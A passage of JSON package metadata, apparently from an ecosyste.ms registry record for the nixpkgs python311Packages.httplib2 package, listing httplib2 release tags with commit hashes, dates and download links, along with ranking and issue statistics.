b.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T15:39:37.148Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python311Packages.httplib2?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python311Packages.httplib2/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian 